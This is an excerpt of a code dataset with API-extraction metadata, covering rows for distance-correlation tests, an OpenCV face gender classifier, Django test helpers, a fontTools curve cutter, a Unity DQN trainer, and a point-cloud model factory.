proj(u_x)\n p_yz = proj(u_y)\n\n # Use the pdcor statistic\n def statistic_function(distance_matrix):\n return u_x.shape[0] * _dcor_internals.u_product(\n distance_matrix, p_yz)\n\n return _hypothesis._permutation_test_with_sym_matrix(\n p_xz,\n statistic_function=statistic_function,\n num_resamples=num_resamples,\n random_state=random_state,\n n_jobs=n_jobs)\n\n\ndef distance_correlation_t_statistic(x, y):\n \"\"\"\n Transformation of the bias corrected version of distance correlation used\n in :func:`distance_correlation_t_test`.\n\n Parameters\n ----------\n x: array_like\n First random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n y: array_like\n Second random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n\n Returns\n -------\n numpy scalar\n T statistic.\n\n See Also\n --------\n distance_correlation_t_test\n\n Examples\n --------\n >>> import numpy as np\n >>> import dcor\n >>> a = np.array([[1, 2, 3, 4],\n ... [5, 6, 7, 8],\n ... [9, 10, 11, 12],\n ... [13, 14, 15, 16]])\n >>> b = np.array([[1, 0, 0, 1],\n ... [0, 1, 1, 1],\n ... [1, 1, 1, 1],\n ... [1, 1, 0, 1]])\n >>> with np.errstate(divide='ignore'):\n ... dcor.independence.distance_correlation_t_statistic(a, a)\n inf\n >>> dcor.independence.distance_correlation_t_statistic(a, b)\n ... # doctest: +ELLIPSIS\n -0.4430164...\n >>> with np.errstate(divide='ignore'):\n ... dcor.independence.distance_correlation_t_statistic(b, b)\n inf\n\n \"\"\"\n bcdcor = u_distance_correlation_sqr(x, y)\n\n n = x.shape[0]\n v = n * (n - 3) / 2\n\n return np.sqrt(v - 1) * bcdcor / np.sqrt(1 - bcdcor**2)\n\n\ndef distance_correlation_t_test(x, y):\n \"\"\"\n Test of independence for high dimension based on convergence to a Student t\n distribution. The null hypothesis is that the two random vectors are\n independent.\n\n Parameters\n ----------\n x: array_like\n First random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n y: array_like\n Second random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n\n Returns\n -------\n HypothesisTest\n Results of the hypothesis test.\n\n See Also\n --------\n distance_correlation_t_statistic\n\n Examples\n --------\n >>> import numpy as np\n >>> import dcor\n >>> a = np.array([[1, 2, 3, 4],\n ... [5, 6, 7, 8],\n ... [9, 10, 11, 12],\n ... [13, 14, 15, 16]])\n >>> b = np.array([[1, 0, 0, 1],\n ... [0, 1, 1, 1],\n ... [1, 1, 1, 1],\n ... [1, 1, 0, 1]])\n >>> with np.errstate(divide='ignore'):\n ... dcor.independence.distance_correlation_t_test(a, a)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=0.0, statistic=inf)\n >>> dcor.independence.distance_correlation_t_test(a, b)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=0.6327451..., statistic=-0.4430164...)\n >>> with np.errstate(divide='ignore'):\n ... dcor.independence.distance_correlation_t_test(b, b)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=0.0, statistic=inf)\n\n \"\"\"\n t_test = distance_correlation_t_statistic(x, y)\n\n n = x.shape[0]\n v = n * (n - 3) / 2\n df = v - 1\n\n p_value = 1 - scipy.stats.t.cdf(t_test, df=df)\n\n return _hypothesis.HypothesisTest(p_value=p_value, statistic=t_test)\n"},"apis":{"kind":"list like","value":["numpy.sqrt"],"string":"[\n \"numpy.sqrt\"\n]"},"extract_api":{"kind":"string","value":"[((9268, 9292), 'numpy.sqrt', 'np.sqrt', (['(1 - bcdcor ** 2)'], {}), '(1 - bcdcor ** 2)\\n', (9275, 9292), True, 'import numpy as np\\n'), ((9242, 9256), 'numpy.sqrt', 'np.sqrt', (['(v - 1)'], {}), '(v - 1)\\n', (9249, 9256), True, 'import numpy as np\\n')]"}}},{"rowIdx":786,"cells":{"code":{"kind":"string","value":"#coding=utf-8\n#性别识别\n\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport chineseText\n\nimg = cv2.imread(\"img/gather.png\")\nface_classifier = cv2.CascadeClassifier(\n \"d:\\Python36\\Lib\\site-packages\\opencv-master\\data\\haarcascades\\haarcascade_frontalface_default.xml\"\n)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = face_classifier.detectMultiScale(\n gray, scaleFactor=1.2, minNeighbors=3, minSize=(140, 140))\n\ngender_classifier = load_model(\n \"classifier/gender_models/simple_CNN.81-0.96.hdf5\")\ngender_labels = {0: '女', 1: '男'}\ncolor = (255, 255, 255)\n\nfor (x, y, w, h) in faces:\n face = img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)]\n face = cv2.resize(face, (48, 48))\n face = np.expand_dims(face, 0)\n face = face / 255.0\n gender_label_arg = np.argmax(gender_classifier.predict(face))\n gender = gender_labels[gender_label_arg]\n cv2.rectangle(img, (x, y), (x + h, y + w), color, 2)\n img = chineseText.cv2ImgAddText(img, gender, x + h, y, color, 30)\n\ncv2.imshow(\"Image\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n"},"apis":{"kind":"list like","value":["cv2.rectangle","keras.models.load_model","cv2.imshow","cv2.waitKey","cv2.destroyAllWindows","cv2.cvtColor","numpy.expand_dims","cv2.CascadeClassifier","cv2.resize","cv2.imread","chineseText.cv2ImgAddText"],"string":"[\n \"cv2.rectangle\",\n \"keras.models.load_model\",\n \"cv2.imshow\",\n \"cv2.waitKey\",\n \"cv2.destroyAllWindows\",\n \"cv2.cvtColor\",\n \"numpy.expand_dims\",\n \"cv2.CascadeClassifier\",\n \"cv2.resize\",\n \"cv2.imread\",\n \"chineseText.cv2ImgAddText\"\n]"},"extract_api":{"kind":"string","value":"[((113, 141), 'cv2.imread', 'cv2.imread', (['\"\"\"img/gather.png\"\"\"'], {}), \"('img/gather.png')\\n\", (123, 141), False, 'import cv2\\n'), ((160, 299), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['\"\"\"d:\\\\\\\\Python36\\\\\\\\Lib\\\\\\\\site-packages\\\\\\\\opencv-master\\\\\\\\data\\\\\\\\haarcascades\\\\\\\\haarcascade_frontalface_default.xml\"\"\"'], {}), \"(\\n 'd:\\\\\\\\Python36\\\\\\\\Lib\\\\\\\\site-packages\\\\\\\\opencv-master\\\\\\\\data\\\\\\\\haarcascades\\\\\\\\haarcascade_frontalface_default.xml'\\n )\\n\", (181, 299), False, 'import cv2\\n'), ((296, 333), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2GRAY'], {}), '(img, cv2.COLOR_BGR2GRAY)\\n', (308, 333), False, 'import cv2\\n'), ((460, 522), 'keras.models.load_model', 'load_model', (['\"\"\"classifier/gender_models/simple_CNN.81-0.96.hdf5\"\"\"'], {}), \"('classifier/gender_models/simple_CNN.81-0.96.hdf5')\\n\", (470, 522), False, 'from keras.models import load_model\\n'), ((1010, 1034), 'cv2.imshow', 'cv2.imshow', (['\"\"\"Image\"\"\"', 'img'], {}), \"('Image', img)\\n\", (1020, 1034), False, 'import cv2\\n'), ((1035, 1049), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\\n', (1046, 1049), False, 'import cv2\\n'), ((1050, 1073), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\\n', (1071, 1073), False, 'import cv2\\n'), ((685, 711), 'cv2.resize', 'cv2.resize', (['face', '(48, 48)'], {}), '(face, (48, 48))\\n', (695, 711), False, 'import cv2\\n'), ((723, 746), 'numpy.expand_dims', 'np.expand_dims', (['face', '(0)'], {}), '(face, 0)\\n', (737, 746), True, 'import numpy as np\\n'), ((886, 938), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + h, y + w)', 'color', '(2)'], {}), '(img, (x, y), (x + h, y + w), color, 2)\\n', (899, 938), False, 'import cv2\\n'), ((949, 1008), 'chineseText.cv2ImgAddText', 'chineseText.cv2ImgAddText', (['img', 'gender', '(x + h)', 'y', 'color', '(30)'], {}), '(img, gender, x + h, y, color, 30)\\n', (974, 1008), False, 'import chineseText\\n')]"}}},{"rowIdx":787,"cells":{"code":{"kind":"string","value":"from django.test import TestCase\nfrom os import path\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nimport random\n\nfrom scheduler.models import Profile\nfrom scheduler.factories import (\n CourseFactory,\n SpacetimeFactory,\n UserFactory,\n ProfileFactory,\n SectionFactory,\n AttendanceFactory,\n OverrideFactory,\n create_attendances_for,\n)\n\nrandom.seed(0)\n\nCOURSE_NAMES = (\"CS88\", \"CS61A\", \"CS61B\", \"CS70\", \"CS61C\", \"EE16A\")\nROLE_MAP = Profile.ROLE_MAP\nBASE_PATH = \"/scheduler\"\n\n# ----- REQUEST UTILITIES -----\ndef fail_msg(ep, resp):\n return \"Endpoint: {}\\nResponse Content: {}\".format(ep, resp.content)\n\n\nclass APITestCase(TestCase):\n def get_client_for(self, user):\n \"\"\"Returns an APIClient object that is logged in as the provided user.\"\"\"\n client = APIClient()\n client.force_authenticate(user)\n return client\n\n def request(self, method, endpoint, exp_code=None, data=None):\n \"\"\"\n Performs a request to the specified endpoint and returns the response object.\n Also checks if the status code of the response is exp_code, if provided.\n The method parameter should be a get/post/etc from an APIClient object.\n \"\"\"\n resp = method(path.join(BASE_PATH, endpoint.strip(\"/\")), follow=True, data=data)\n if exp_code is not None:\n self.assertEqual(resp.status_code, exp_code, msg=fail_msg(endpoint, resp))\n return resp\n\n def req_fails_perms(self, method, endpoint, data=None):\n \"\"\"\n Performs a request to the specified endpoint, and checks that it fails\n due to the user lacking proper permissions.\n The method parameter should be a get/post/etc from an APIClient object.\n Returns the response object afterwards.\n \"\"\"\n return self.request(\n method, endpoint, exp_code=status.HTTP_403_FORBIDDEN, data=data\n )\n\n def req_fails_method(self, method, endpoint, data=None):\n \"\"\"\n Performs a request to the specified endpoint, and checks that it fails\n due to the endpoint not supporting the provided method.\n Returns the response object.\n \"\"\"\n return self.request(\n method, endpoint, exp_code=status.HTTP_405_METHOD_NOT_ALLOWED, data=data\n )\n\n def req_succeeds(self, method, endpoint, data=None):\n \"\"\"\n Performs a request to the specified endpoint, and checks that it succeeds.\n The method parameter should be a get/post/etc from an APIClient object.\n Returns the response object.\n \"\"\"\n return self.request(method, endpoint, exp_code=status.HTTP_200_OK, data=data)\n\n\n# ----- MODEL GENERATION -----\n\n\ndef random_objs(clazz, n=1):\n \"\"\"\n Generates N instances of the provided class, retrieved from the database.\n \"\"\"\n src = clazz.objects.all()\n for _ in range(n):\n yield random.choice(src)\n\n\ndef make_test_courses():\n \"\"\"Creates course objects and persists them to database.\"\"\"\n return [CourseFactory.create(name=name) for name in COURSE_NAMES]\n\n\ndef make_test_users(n):\n \"\"\"Creates N test users and persists them to database.\"\"\"\n return UserFactory.create_batch(n)\n\n\ndef give_role(user, role, course):\n \"\"\"\n\tCreates a profile for USER in a given ROLE for the provided COURSE, and\n\tsaves the profile to database.\n\t\"\"\"\n return ProfileFactory.create(\n user=user, course=course, leader=None, section=None, role=role\n )\n\n\ndef create_empty_section_for(mentor):\n \"\"\"\n\tCreates a section for MENTOR without populated students.\n\t\"\"\"\n return SectionFactory.create(course=mentor.course, mentor=mentor)\n\n\ndef enroll_user_as_student(user, section):\n \"\"\"\n\tCreates a student profile for USER, and assigns them to the given SECTION.\n\tAlso creates blank attendances as necessary.\n\tReturns the created profile.\n\t\"\"\"\n student = give_role(user, Profile.STUDENT, section.course)\n student.section = section\n student.leader = section.leader\n create_attendances_for(student)\n return student\n\n\ndef gen_test_data(cls, NUM_USERS=300):\n \"\"\"\n\tAdds NUM_USERS users to the database and initializes profiles for them as follows:\n\t- 2 coords per course\n\t- 4 SMs per coord, each with a section of 3-6 students\n\t- 3 JMs per SM, each with a section of 3-6 students\n\t\"\"\"\n users = iter(make_test_users(NUM_USERS))\n courses = make_test_courses()\n # for sanity tests, everyone only has one role for now\n num_courses = len(courses)\n coords, seniors, juniors, students = [], [], [], []\n COORD_COUNT = 2\n SM_COUNT = 4\n JM_COUNT = 3\n\n def assign(role, leader, c, lst):\n # returns the profile created\n profile = give_role(next(users), role, c)\n profile.leader = leader\n lst.append(profile)\n return profile\n\n try:\n for c in courses:\n # coords\n for i in range(COORD_COUNT):\n coord = assign(Profile.COORDINATOR, None, c, coords)\n # SMs\n for j in range(SM_COUNT):\n sm = assign(Profile.SENIOR_MENTOR, coord, c, seniors)\n section = create_empty_section_for(sm)\n for k in range(random.randint(3, 6)):\n students.append(enroll_user_as_student(next(users), section))\n # JMs\n for k in range(JM_COUNT):\n jm = assign(Profile.JUNIOR_MENTOR, sm, c, juniors)\n for _ in range(random.randint(3, 6)):\n students.append(\n enroll_user_as_student(next(users), section)\n )\n except StopIteration:\n pass\n cls.users = users\n cls.courses = courses\n cls.coords = coords\n cls.seniors = seniors\n cls.juniors = juniors\n cls.students = students\n"},"apis":{"kind":"list like","value":["random.choice","scheduler.factories.create_attendances_for","scheduler.factories.UserFactory.create_batch","random.seed","rest_framework.test.APIClient","scheduler.factories.SectionFactory.create","scheduler.factories.ProfileFactory.create","scheduler.factories.CourseFactory.create","random.randint"],"string":"[\n \"random.choice\",\n \"scheduler.factories.create_attendances_for\",\n \"scheduler.factories.UserFactory.create_batch\",\n \"random.seed\",\n \"rest_framework.test.APIClient\",\n \"scheduler.factories.SectionFactory.create\",\n \"scheduler.factories.ProfileFactory.create\",\n \"scheduler.factories.CourseFactory.create\",\n \"random.randint\"\n]"},"extract_api":{"kind":"string","value":"[((388, 402), 'random.seed', 'random.seed', (['(0)'], {}), '(0)\\n', (399, 402), False, 'import random\\n'), ((3184, 3211), 'scheduler.factories.UserFactory.create_batch', 'UserFactory.create_batch', (['n'], {}), '(n)\\n', (3208, 3211), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\\n'), ((3378, 3467), 'scheduler.factories.ProfileFactory.create', 'ProfileFactory.create', ([], {'user': 'user', 'course': 'course', 'leader': 'None', 'section': 'None', 'role': 'role'}), '(user=user, course=course, leader=None, section=None,\\n role=role)\\n', (3399, 3467), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\\n'), ((3600, 3658), 'scheduler.factories.SectionFactory.create', 'SectionFactory.create', ([], {'course': 'mentor.course', 'mentor': 'mentor'}), '(course=mentor.course, mentor=mentor)\\n', (3621, 3658), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\\n'), ((4002, 4033), 'scheduler.factories.create_attendances_for', 'create_attendances_for', (['student'], {}), '(student)\\n', (4024, 4033), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\\n'), ((821, 832), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\\n', (830, 832), False, 'from rest_framework.test import APIClient\\n'), ((3027, 3058), 'scheduler.factories.CourseFactory.create', 'CourseFactory.create', ([], {'name': 'name'}), '(name=name)\\n', (3047, 3058), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\\n'), ((2905, 2923), 'random.choice', 'random.choice', (['src'], {}), '(src)\\n', (2918, 2923), False, 'import random\\n'), ((5211, 5231), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\\n', (5225, 5231), False, 'import random\\n'), ((5506, 5526), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\\n', (5520, 5526), False, 'import random\\n')]"}}},{"rowIdx":788,"cells":{"code":{"kind":"string","value":"import math\nfrom fontTools.pens.recordingPen import RecordingPen, replayRecording\nfrom fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\nfrom coldtype.geometry import Rect, Point\n\n\ndef raise_quadratic(start, a, b):\n c0 = start\n c1 = (c0[0] + (2/3)*(a[0] - c0[0]), c0[1] + (2/3)*(a[1] - c0[1]))\n c2 = (b[0] + (2/3)*(a[0] - b[0]), b[1] + (2/3)*(a[1] - b[1]))\n c3 = (b[0], b[1])\n return [c1, c2, c3]\n\n__length_cache = {}\n__split_cache = {}\n\ndef splitCubicAtT_cached(a, b, c, d, t):\n global __split_cache\n abcdt = (a, b, c, d, t)\n sc = __split_cache.get(abcdt)\n if sc:\n return sc\n else:\n s = splitCubicAtT(a, b, c, d, t)\n __split_cache[abcdt] = s\n return s\n\ndef calcCubicArcLength_cached(a, b, c, d):\n #return calcCubicArcLength(a, b, c, d)\n global __length_cache\n abcd = (a, b, c, d)\n lc = __length_cache.get(abcd)\n if lc:\n return lc\n else:\n l = calcCubicArcLength(a, b, c, d)\n __length_cache[abcd] = l\n return l\n\nclass CurveCutter():\n def __init__(self, g, inc=0.0015):\n if isinstance(g, RecordingPen):\n self.pen = g\n else:\n self.pen = RecordingPen()\n g.draw(self.pen)\n self.inc = inc\n self.length = self.calcCurveLength()\n \n def calcCurveLength(self):\n length = 0\n for i, (t, pts) in enumerate(self.pen.value):\n if t == \"curveTo\":\n p1, p2, p3 = pts\n p0 = self.pen.value[i-1][-1][-1]\n length += calcCubicArcLength_cached(p0, p1, p2, p3)\n elif t == \"lineTo\":\n pass # todo\n return length\n\n def subsegment(self, start=None, end=None):\n global __cut_cache\n inc = self.inc\n length = self.length\n ended = False\n _length = 0\n out = []\n for i, (t, pts) in enumerate(self.pen.value):\n if t == \"curveTo\":\n p1, p2, p3 = pts\n p0 = self.pen.value[i-1][-1][-1]\n length_arc = calcCubicArcLength_cached(p0, p1, p2, p3)\n if _length + length_arc < end:\n _length += length_arc\n else:\n t = inc\n tries = 0\n while not ended:\n a, b = splitCubicAtT_cached(p0, p1, p2, p3, t)\n length_a = calcCubicArcLength_cached(*a)\n if _length + length_a > end:\n ended = True\n out.append((\"curveTo\", a[1:]))\n else:\n t += inc\n tries += 1\n if t == \"lineTo\":\n pass # TODO\n if not ended:\n out.append((t, pts))\n \n if out[-1][0] != \"endPath\":\n out.append((\"endPath\",[]))\n return out\n\n def subsegmentPoint(self, start=0, end=1):\n inc = self.inc\n subsegment = self.subsegment(start=start, end=end)\n try:\n t, (a, b, c) = subsegment[-2]\n tangent = math.degrees(math.atan2(c[1] - b[1], c[0] - b[0]) + math.pi*.5)\n return c, tangent\n except ValueError:\n return None, None"},"apis":{"kind":"list like","value":["fontTools.misc.bezierTools.splitCubicAtT","fontTools.pens.recordingPen.RecordingPen","math.atan2","fontTools.misc.bezierTools.calcCubicArcLength"],"string":"[\n \"fontTools.misc.bezierTools.splitCubicAtT\",\n \"fontTools.pens.recordingPen.RecordingPen\",\n \"math.atan2\",\n \"fontTools.misc.bezierTools.calcCubicArcLength\"\n]"},"extract_api":{"kind":"string","value":"[((650, 678), 'fontTools.misc.bezierTools.splitCubicAtT', 'splitCubicAtT', (['a', 'b', 'c', 'd', 't'], {}), '(a, b, c, d, t)\\n', (663, 678), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\\n'), ((951, 981), 'fontTools.misc.bezierTools.calcCubicArcLength', 'calcCubicArcLength', (['a', 'b', 'c', 'd'], {}), '(a, b, c, d)\\n', (969, 981), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\\n'), ((1195, 1209), 'fontTools.pens.recordingPen.RecordingPen', 'RecordingPen', ([], {}), '()\\n', (1207, 1209), False, 'from fontTools.pens.recordingPen import RecordingPen, replayRecording\\n'), ((3145, 3181), 'math.atan2', 'math.atan2', (['(c[1] - b[1])', '(c[0] - b[0])'], {}), '(c[1] - b[1], c[0] - b[0])\\n', (3155, 3181), False, 'import math\\n')]"}}},{"rowIdx":789,"cells":{"code":{"kind":"string","value":"\"\"\"\nProject for Udacity Danaodgree in Deep Reinforcement Learning\n\nThis script train an agent to navigate (and collect bananas!) in a large, square world.\n\nA reward of +1 is provided for collecting a yellow banana, and a reward of -1 is provided for collecting a blue banana. Thus, the goal of your agent is to collect as many yellow bananas as possible while avoiding blue bananas.\nThe state space has 37 dimensions and contains the agent's velocity, along with ray-based perception of objects around the agent's forward direction. Given this information, the agent has to learn how to best select actions. Four discrete actions are available, corresponding to:\n0 - move forward.\n1 - move backward.\n2 - turn left.\n3 - turn right.\nThe task is episodic, and in order to solve the environment, your agent must get an average score of +13 over 100 consecutive episodes. \n\"\"\"\nfrom unityagents import UnityEnvironment\nimport numpy as np\nfrom collections import deque\nfrom dqn_agent import Agent\nimport torch\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\"\"\"\nUnity environment configuration\n\nMac: \"path/to/Banana.app\"\nWindows (x86): \"path/to/Banana_Windows_x86/Banana.exe\"\nWindows (x86_64): \"path/to/Banana_Windows_x86_64/Banana.exe\"\nLinux (x86): \"path/to/Banana_Linux/Banana.x86\"\nLinux (x86_64): \"path/to/Banana_Linux/Banana.x86_64\"\nLinux (x86, headless): \"path/to/Banana_Linux_NoVis/Banana.x86\"\nLinux (x86_64, headless): \"path/to/Banana_Linux_NoVis/Banana.x86_64\"\n\"\"\"\n# start Unity environment\nenv = UnityEnvironment(file_name=\"Banana.app\")\n\n# get the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\nenv_info = env.reset(train_mode=False)[brain_name]\n\naction_size = brain.vector_action_space_size\nstate_size = len(env_info.vector_observations[0])\n\n# initialize agent\nagent = Agent(state_size=state_size, action_size=action_size, seed=0, device=device)\n\ndef train(n_episodes=2000, eps_start=1.0, eps_end=0.05, eps_decay=0.99):\n \"\"\"Deep Q-Learning.\n \n Params\n ======\n n_episodes (int): maximum number of training episodes\n eps_start (float): starting value of epsilon, for epsilon-greedy action selection\n eps_end (float): minimum value of epsilon\n eps_decay (float): multiplicative factor (per episode) for decreasing epsilon\n \"\"\"\n scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100) # last 100 scores\n eps = eps_start # initialize epsilon\n for i_episode in range(1, n_episodes+1):\n # reset environment\n env_info = env.reset(train_mode=True)[brain_name]\n # get initial state\n state = env_info.vector_observations[0]\n # set initial score\n score = 0\n \n while True:\n action = agent.act(state, eps)\n env_info = env.step(action)[brain_name]\n \n next_state, reward, done = env_info.vector_observations[0], env_info.rewards[0], env_info.local_done[0]\n agent.step(state, action, reward, next_state, done)\n \n state = next_state\n score += reward\n if done:\n break \n scores_window.append(score) # save most recent score\n scores.append(score) # save most recent score\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n if np.mean(scores_window)>=14:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth')\n break\n return scores\n\ntrain()"},"apis":{"kind":"list like","value":["numpy.mean","collections.deque","dqn_agent.Agent","unityagents.UnityEnvironment","torch.cuda.is_available"],"string":"[\n \"numpy.mean\",\n \"collections.deque\",\n \"dqn_agent.Agent\",\n \"unityagents.UnityEnvironment\",\n \"torch.cuda.is_available\"\n]"},"extract_api":{"kind":"string","value":"[((1524, 1564), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': '\"\"\"Banana.app\"\"\"'}), \"(file_name='Banana.app')\\n\", (1540, 1564), False, 'from unityagents import UnityEnvironment\\n'), ((1829, 1905), 'dqn_agent.Agent', 'Agent', ([], {'state_size': 'state_size', 'action_size': 'action_size', 'seed': '(0)', 'device': 'device'}), '(state_size=state_size, action_size=action_size, seed=0, device=device)\\n', (1834, 1905), False, 'from dqn_agent import Agent\\n'), ((2429, 2446), 'collections.deque', 'deque', ([], {'maxlen': '(100)'}), '(maxlen=100)\\n', (2434, 2446), False, 'from collections import deque\\n'), ((1038, 1063), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\\n', (1061, 1063), False, 'import torch\\n'), ((3653, 3675), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\\n', (3660, 3675), True, 'import numpy as np\\n'), ((3477, 3499), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\\n', (3484, 3499), True, 'import numpy as np\\n'), ((3617, 3639), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\\n', (3624, 3639), True, 'import numpy as np\\n'), ((3785, 3807), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\\n', (3792, 3807), True, 'import numpy as np\\n')]"}}},{"rowIdx":790,"cells":{"code":{"kind":"string","value":"# Warsaw University of Technology\n\nfrom layers.eca_block import ECABasicBlock\nfrom models.minkgl import MinkHead, MinkTrunk, MinkGL\n\n\nfrom models.minkloc import MinkLoc\nfrom third_party.minkloc3d.minkloc import MinkLoc3D\nfrom misc.utils import ModelParams\n\n\ndef model_factory(model_params: ModelParams):\n in_channels = 1\n\n if model_params.model == 'MinkLoc':\n model = MinkLoc(in_channels=in_channels, feature_size=model_params.feature_size,\n output_dim=model_params.output_dim, planes=model_params.planes,\n layers=model_params.layers, num_top_down=model_params.num_top_down,\n conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.block,\n pooling_method=model_params.pooling)\n elif model_params.model == 'MinkLoc3D':\n model = MinkLoc3D()\n elif 'egonn' in model_params.model:\n model = create_egonn_model(model_params)\n else:\n raise NotImplementedError('Model not implemented: {}'.format(model_params.model))\n\n return model\n\n\ndef create_egonn_model(model_params: ModelParams):\n model_name = model_params.model\n\n global_normalize = False\n local_normalize = True\n\n if model_name == 'egonn':\n # THIS IS OUR BEST MODEL\n block = ECABasicBlock\n planes = [32, 64, 64, 128, 128, 128, 128]\n layers = [1, 1, 1, 1, 1, 1, 1]\n\n global_in_levels = [5, 6, 7]\n global_map_channels = 128\n global_descriptor_size = 256\n\n local_in_levels = [3, 4]\n local_map_channels = 64\n local_descriptor_size = 128\n\n else:\n raise NotImplementedError(f'Unknown model: {model_name}')\n\n # Planes list number of channels for level 1 and above\n global_in_channels = [planes[i-1] for i in global_in_levels]\n head_global = MinkHead(global_in_levels, global_in_channels, global_map_channels)\n\n if len(local_in_levels) > 0:\n local_in_channels = [planes[i-1] for i in local_in_levels]\n head_local = MinkHead(local_in_levels, local_in_channels, local_map_channels)\n else:\n head_local = None\n\n min_out_level = len(planes)\n if len(global_in_levels) > 0:\n min_out_level = min(min_out_level, min(global_in_levels))\n if len(local_in_levels) > 0:\n min_out_level = min(min_out_level, min(local_in_levels))\n\n trunk = MinkTrunk(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5, block=block,\n min_out_level=min_out_level)\n\n net = MinkGL(trunk, local_head=head_local, local_descriptor_size=local_descriptor_size,\n local_normalize=local_normalize, global_head=head_global,\n global_descriptor_size=global_descriptor_size, global_pool_method='GeM',\n global_normalize=global_normalize, quantizer=model_params.quantizer)\n\n return net"},"apis":{"kind":"list like","value":["models.minkgl.MinkHead","models.minkgl.MinkGL","models.minkloc.MinkLoc","models.minkgl.MinkTrunk","third_party.minkloc3d.minkloc.MinkLoc3D"],"string":"[\n \"models.minkgl.MinkHead\",\n \"models.minkgl.MinkGL\",\n \"models.minkloc.MinkLoc\",\n \"models.minkgl.MinkTrunk\",\n \"third_party.minkloc3d.minkloc.MinkLoc3D\"\n]"},"extract_api":{"kind":"string","value":"[((1835, 1902), 'models.minkgl.MinkHead', 'MinkHead', (['global_in_levels', 'global_in_channels', 'global_map_channels'], {}), '(global_in_levels, global_in_channels, global_map_channels)\\n', (1843, 1902), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\\n'), ((2370, 2491), 'models.minkgl.MinkTrunk', 'MinkTrunk', ([], {'in_channels': '(1)', 'planes': 'planes', 'layers': 'layers', 'conv0_kernel_size': '(5)', 'block': 'block', 'min_out_level': 'min_out_level'}), '(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5,\\n block=block, min_out_level=min_out_level)\\n', (2379, 2491), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\\n'), ((2521, 2821), 'models.minkgl.MinkGL', 'MinkGL', (['trunk'], {'local_head': 'head_local', 'local_descriptor_size': 'local_descriptor_size', 'local_normalize': 'local_normalize', 'global_head': 'head_global', 'global_descriptor_size': 'global_descriptor_size', 'global_pool_method': '\"\"\"GeM\"\"\"', 'global_normalize': 'global_normalize', 'quantizer': 'model_params.quantizer'}), \"(trunk, local_head=head_local, local_descriptor_size=\\n local_descriptor_size, local_normalize=local_normalize, global_head=\\n head_global, global_descriptor_size=global_descriptor_size,\\n global_pool_method='GeM', global_normalize=global_normalize, quantizer=\\n model_params.quantizer)\\n\", (2527, 2821), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\\n'), ((381, 716), 'models.minkloc.MinkLoc', 'MinkLoc', ([], {'in_channels': 'in_channels', 'feature_size': 'model_params.feature_size', 'output_dim': 'model_params.output_dim', 'planes': 'model_params.planes', 'layers': 'model_params.layers', 'num_top_down': 'model_params.num_top_down', 'conv0_kernel_size': 'model_params.conv0_kernel_size', 'block': 'model_params.block', 'pooling_method': 'model_params.pooling'}), '(in_channels=in_channels, feature_size=model_params.feature_size,\\n output_dim=model_params.output_dim, planes=model_params.planes, layers=\\n model_params.layers, num_top_down=model_params.num_top_down,\\n conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.\\n block, pooling_method=model_params.pooling)\\n', (388, 716), False, 'from models.minkloc import MinkLoc\\n'), ((2025, 2089), 'models.minkgl.MinkHead', 